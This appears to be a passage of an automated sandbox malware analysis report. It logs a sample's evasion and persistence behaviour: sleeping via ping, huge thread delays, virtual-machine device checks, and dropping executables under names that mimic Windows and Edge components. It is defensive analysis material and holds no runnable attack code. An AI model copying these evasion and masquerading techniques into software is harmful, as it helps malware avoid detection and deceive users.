                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 1ABE0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeMemory allocated: 2140000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeMemory allocated: 1A360000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeMemory allocated: C00000 memory reserve | memory write watch
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeMemory allocated: 1A700000 memory reserve | memory write watch
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 10C0000 memory reserve | memory write watch
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 1140000 memory reserve | memory write watch
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2919
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2584
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4094
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2640
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2489
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\qMBWbOkw.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZndYtGLf.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\GOHavRZK.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\Qxaqfufs.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\alFgOGaa.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\kTYwyifI.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\SHwrfMKt.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 2108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe TID: 2284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 2919 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 2584 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 4094 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 2640 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep count: 3864 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 2489 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 7604Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0045A69B
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0046C220
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0047B348 FindFirstFileExA,0_2_0047B348
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046E6A3 VirtualQuery,GetSystemInfo,0_2_0046E6A3
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: wscript.exe, 00000002.00000002.2355242317.0000000000823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,B
